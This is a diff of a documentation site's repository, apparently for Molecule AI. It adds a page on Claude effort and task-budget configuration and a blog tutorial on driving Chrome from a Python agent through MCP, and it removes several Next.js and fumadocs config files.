When set to a non-zero value, Claude will not exceed that many tokens of thinking/reasoning per turn. This lets you cap spend on a per-workspace basis without changing the effort level.
### When task budget applies
Task budget only has an effect when:
1. The workspace is running `runtime: claude-code` or a `claude`/`anthropic` model
2. The beta header `task-budgets-2026-03-13` is enabled (see [Beta header](#beta-header-requirement) below)
3. The effort level is `xhigh` or `max` (extended thinking must be active for the budget to be exercised)
Setting a `task_budget` on a `low`/`medium`/`high` effort workspace is harmless — it will be sent but has no practical effect without extended thinking active.
### Guidance
- **20,000 tokens** is the beta minimum. Values below this are ignored by the API.
- **50,000100,000 tokens** covers most complex coding and analysis tasks.
- **200,000+ tokens** is appropriate for research-grade or competitive-benchmark workloads.
- A tighter budget reduces cost on `xhigh`/`max` workspaces but may truncate reasoning on very hard problems. Watch your workspace metrics and adjust if you see quality regressions.
<Callout type="info">
**Executor wiring — coming in the next release.** The Config tab writes `effort` and `task_budget` to `config.yaml` today (PRs #639 and #654). The workspace executor that reads these values and passes them to the Claude SDK is tracked on the workspace-template side and will ship in the next release. Until that lands, the config is stored and visible but does not yet affect inference.
</Callout>
---
## config.yaml reference
Both fields serialize as top-level keys in `config.yaml`:
```yaml title="config.yaml — effort + task_budget examples"
name: Senior Reviewer
runtime: claude-code
model: anthropic:claude-opus-4-7
role: |
You are a senior engineer performing code review. Be thorough.
tier: 3
# Claude Settings
effort: high
task_budget: 0 # 0 = unset; omitted from API call
```
```yaml title="config.yaml — extended thinking at a fixed budget"
name: Architect
runtime: claude-code
model: anthropic:claude-opus-4-7
role: |
You design systems. Think deeply before recommending an architecture.
tier: 3
effort: xhigh
task_budget: 80000 # cap thinking at 80k tokens per turn
```
```yaml title="config.yaml — max effort, no budget cap"
name: Research Agent
runtime: claude-code
model: anthropic:claude-opus-4-7
role: |
You conduct research. Quality is the only constraint.
tier: 4
effort: max
# task_budget omitted — no ceiling on reasoning depth
```
When `task_budget` is `0`, `toYaml()` omits it from the file entirely — the field only appears in `config.yaml` when it holds a positive value.
---
## Beta header requirement
The `task_budget` feature requires the Anthropic API beta header:
```
anthropic-beta: task-budgets-2026-03-13
```
This header is added automatically by the workspace executor when `task_budget > 0` is present in `config.yaml`. You do not need to set it manually in your workspace config — it is an implementation detail of the executor, not a user-configurable option.
<Callout type="warn">
If you call the Anthropic Messages API directly (outside of a Molecule AI workspace), you must include `anthropic-beta: task-budgets-2026-03-13` in your request headers for `output_config.task_budget` to take effect. Omitting it causes the parameter to be silently ignored.
</Callout>
---
## See also
- [Concepts — Workspaces](/docs/concepts#workspaces) — workspace primitives overview
- [Org Template](/docs/org-template) — deploy effort/task_budget settings across an entire team via `org.yaml`
- [Observability](/docs/observability) — monitor token usage per workspace to tune your budget settings
- [API Reference — POST /workspaces](/docs/api-reference#post-workspaces)
- [Claude Opus 4.7 — Anthropic docs](https://docs.anthropic.com) — upstream reference for `output_config`

View File

@ -0,0 +1,240 @@
---
title: "How to Add Browser Automation to AI Agents with MCP"
description: "Learn how to connect an AI agent to Chrome via the Model Context Protocol (MCP) for autonomous browser automation. Step-by-step tutorial with Python code."
pubDate: "2026-04-20"
author: Molecule AI Team
tags: ["MCP", "AI Agents", "Browser Automation", "Python", "Chrome DevTools"]
---
AI agents are remarkably good at reasoning, planning, and generating text. But ask one to click a button on a website, extract data from a dynamic page, or verify that your UI renders correctly after a deploy — and most agents hit a wall. They're stateless, headless, and blind to anything that happens in a browser.
The traditional workaround has been to bolt on Playwright or Selenium scripts — brittle, coordinate-based automation that breaks the moment your UI changes. There's a better way.
The **Model Context Protocol (MCP)** gives AI agents a structured, intent-driven interface to control Chrome DevTools directly. No XPath guessing. No screenshot comparison. The agent reasons about the page's live DOM just like a developer would.
In this tutorial, you'll wire a Python-based AI agent to Chrome using Molecule AI's MCP integration. By the end, your agent will navigate websites, inspect elements, and report findings autonomously.
---
## What Is the Model Context Protocol?
If you've ever plugged a peripheral into a laptop, you've used USB-C. Before USB-C, every device needed its own port — printers had one plug, monitors had another, storage had yet another. USB-C collapsed that into a single universal interface.
MCP is USB-C for AI tools. It's an open protocol that lets an AI agent connect to any external tool — databases, filesystems, browsers, APIs — using a single standardized interface. Instead of hard-coding "call this Slack webhook when the agent decides X," you point the agent at an MCP server and it figures out which tools to use.
The practical benefit: once your agent speaks MCP, you can swap out any underlying tool without touching the agent's logic. Connect to Chrome DevTools today, swap in a filesystem MCP server tomorrow — the agent doesn't care.
---
## Why Chrome DevTools Over Playwright or Selenium?
Playwright and Selenium are record-and-playback tools. They're designed for QA engineers to script interactions. They work — but they're fragile when AI agents try to use them:
- **Coordinate-based selectors** break when the UI changes.
- **No semantic understanding** — the agent has to guess which element to target.
- **No access to the protocol layer** — you're working through an abstraction that limits what's possible.
Chrome DevTools Protocol (CDP) is what Chrome itself uses internally. When you open DevTools in Chrome and click the "Elements" tab, that's CDP under the hood. By connecting via MCP, your agent gets:
- **Live DOM access** — read and write the full document object model.
- **Network interception** — observe and modify HTTP requests in flight.
- **Headless or headed** — run in the background or show a visible browser window for debugging.
- **Performance metrics** — pull Core Web Vitals, console logs, and timing data directly.
For an AI agent that needs to *understand* and *act on* a web page, CDP is the professional-grade choice.
---
## Prerequisites
- Python 3.10 or higher
- Google Chrome (any recent version)
- Molecule AI SDK (`pip install molecule-ai`)
- A Molecule AI workspace — [get started in under 5 minutes](/docs/quickstart)
---
## Step-by-Step Setup
### 1. Start Chrome with Remote Debugging
Chrome exposes CDP over a WebSocket at a configurable port. Start Chrome with remote debugging enabled:
```bash
# macOS
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome \
--remote-debugging-port=9222 \
--user-data-dir=/tmp/chrome-debug
# Linux
google-chrome --remote-debugging-port=9222 --user-data-dir=/tmp/chrome-debug
# Windows
chrome.exe --remote-debugging-port=9222 --user-data-dir="C:\tmp\chrome-debug"
```
To run headless (no visible window):
```bash
google-chrome \
--headless \
--remote-debugging-port=9222 \
--user-data-dir=/tmp/chrome-headless
```
**Note:** Ensure no other Chrome instance is already using port 9222.
### 2. Configure Molecule AI to Load the MCP Server
Create a `molecule.toml` in your project root:
```toml
[mcp]
enabled = true
[[mcp.servers]]
name = "chrome-devtools"
type = "stdio"
command = ["npx", "-y", "@modelcontextprotocol/server-chrome"]
```
This tells Molecule AI's runtime to spin up the Chrome DevTools MCP server as a subprocess and communicate with it over stdio.
### 3. Write Your First Browser-Aware Agent
```python
from molecule import Agent
from molecule.tools.mcp import MCPToolset
# Load the Chrome DevTools toolset
chrome = MCPToolset("chrome-devtools")
agent = Agent(
name="browser-agent",
tools=[chrome],
model="claude-sonnet-4"
)
task = """
Navigate to https://news.ycombinator.com.
Find the top-ranked post (by points).
Extract the title, URL, and point count.
Report your findings.
"""
result = agent.run(task)
print(result.final_output)
```
Run it:
```bash
python browser_agent.py
```
Sample output:
```
The top-ranked post on Hacker News right now is:
Title: "MCP: A new standard for connecting AI to everything"
URL: https://news.ycombinator.com/item?id=44191023
Points: 847 (and counting)
```
The agent navigated, reasoned about the page structure, extracted the right data, and reported it — all without any hard-coded selectors or XPath expressions.
---
## Real-World Example: Autonomous UI Testing
Here's where it gets interesting. Instead of just extracting data, let's have the agent actively probe a page for bugs.
```python
from molecule import Agent
from molecule.tools.mcp import MCPToolset
chrome = MCPToolset("chrome-devtools")
agent = Agent(
name="qa-agent",
tools=[chrome],
model="claude-sonnet-4"
)
task = """
Open https://example-app-staging.vercel.app/pricing.
Check every CTA button on the page. For each one:
1. Verify the button has a click handler (not disabled or missing onClick).
2. Click it and confirm the navigation or modal behavior is correct.
3. Report any button that is broken or leads to a 404.
If all buttons pass, say "All CTA buttons functional."
"""
result = agent.run(task)
print(result.final_output)
```
The agent doesn't just click — it reasons about what it's seeing. If a button navigates to a dead URL, it notices. If a modal fails to open, it records the failure. You get a structured bug report without writing a single test assertion.
This pattern scales to:
- **Accessibility audits** — the agent can check for missing ARIA labels, contrast issues, and keyboard trap.
- **Visual regression** — the agent can screenshot elements and compare against baselines.
- **Form testing** — the agent can fill out forms, submit them, and validate server responses.
---
## Extending to the Broader MCP Ecosystem
Chrome DevTools is just one node in the MCP graph. The same agent you just built can also connect to:
- **Filesystem** — read and write local files based on browser data.
- **GitHub** — open issues automatically when the agent finds broken links.
- **Slack** — ping your team when the QA agent finds a critical bug.
- **PostgreSQL** — write scraped data directly to a database.
Here's a multi-tool example:
```python
from molecule import Agent
from molecule.tools.mcp import MCPToolset
agent = Agent(
name="full-stack-agent",
tools=[
MCPToolset("chrome-devtools"),
MCPToolset("filesystem"),
MCPToolset("github"),
],
model="claude-sonnet-4"
)
task = """
Scrape the top 10 trending repos from GitHub's trending page.
For each repo, check if there's an open issue labeled 'good first issue'.
If yes, post a Slack message to #engineering with the repo name and issue link.
Also write a summary CSV to ./trending-repos.csv.
"""
result = agent.run(task)
```
The agent coordinates across three MCP tools as naturally as it would use a single one. MCP's protocol-level abstraction means the agent doesn't need to know or care that it's talking to Chrome, a filesystem, and GitHub — it just calls tools and gets results.
---
## Get Started
Ready to build your first browser-aware AI agent? Here's the quick path:
1. **[Create a Molecule AI workspace](/docs/quickstart)** — free, self-hostable.
2. **[Read the MCP Server reference](/docs/mcp-server)** — full reference for all supported servers.
3. **[Browse the Chrome DevTools MCP setup guide](/docs/guides/chrome-devtools-mcp-setup)** — setup walkthrough and available tools.
Once your agent is connected to MCP, it stops being a chatbot with a scrollable output. It becomes an actor that can navigate the web, inspect reality, and take action in the world.
---
*Have questions or want to share what you're building with MCP? Open a discussion on [GitHub Discussions](https://github.com/Molecule-AI/molecule-core/discussions) or file an issue with the `enhancement` label.*

View File

@ -1,7 +0,0 @@
import { docs } from '@/.source/server';
import { loader } from 'fumadocs-core/source';
export const source = loader({
baseUrl: '/docs',
source: docs.toFumadocsSource(),
});

View File

@ -1,9 +0,0 @@
import defaultMdxComponents from 'fumadocs-ui/mdx';
import type { MDXComponents } from 'mdx/types';
export function getMDXComponents(components?: MDXComponents): MDXComponents {
return {
...defaultMdxComponents,
...components,
};
}

View File

@ -1,10 +0,0 @@
import { createMDX } from 'fumadocs-mdx/next';
const withMDX = createMDX();
/** @type {import('next').NextConfig} */
const config = {
reactStrictMode: true,
};
export default withMDX(config);

5999
package-lock.json generated

File diff suppressed because it is too large Load Diff

View File

@ -1,31 +0,0 @@
{
"name": "molecule-docs",
"version": "0.1.0",
"private": true,
"description": "Molecule AI documentation site — doc.moleculesai.app",
"scripts": {
"build": "next build",
"dev": "next dev",
"start": "next start",
"postinstall": "fumadocs-mdx",
"lint": "next lint"
},
"dependencies": {
"fumadocs-core": "^16.7.16",
"fumadocs-mdx": "^14.3.0",
"fumadocs-ui": "^16.7.16",
"next": "^16.2.4",
"react": "^19.2.5",
"react-dom": "^19.2.5"
},
"devDependencies": {
"@tailwindcss/postcss": "^4.2.2",
"@types/mdx": "^2.0.13",
"@types/node": "^22.0.0",
"@types/react": "^19.2.14",
"@types/react-dom": "^19.2.3",
"postcss": "^8.5.10",
"tailwindcss": "^4.2.2",
"typescript": "^5.6.3"
}
}

View File

@ -1,5 +0,0 @@
export default {
plugins: {
'@tailwindcss/postcss': {},
},
};

View File

@ -1,11 +0,0 @@
import { defineConfig, defineDocs } from 'fumadocs-mdx/config';
export const docs = defineDocs({
dir: 'content/docs',
});
export default defineConfig({
mdxOptions: {
// Add remark/rehype plugins here as needed.
},
});

View File

@ -1,41 +0,0 @@
{
"compilerOptions": {
"target": "ES2022",
"lib": [
"dom",
"dom.iterable",
"esnext"
],
"allowJs": true,
"skipLibCheck": true,
"strict": true,
"noEmit": true,
"esModuleInterop": true,
"module": "esnext",
"moduleResolution": "Bundler",
"resolveJsonModule": true,
"isolatedModules": true,
"jsx": "react-jsx",
"incremental": true,
"plugins": [
{
"name": "next"
}
],
"paths": {
"@/*": [
"./*"
]
}
},
"include": [
"next-env.d.ts",
"**/*.ts",
"**/*.tsx",
".next/types/**/*.ts",
".next/dev/types/**/*.ts"
],
"exclude": [
"node_modules"
]
}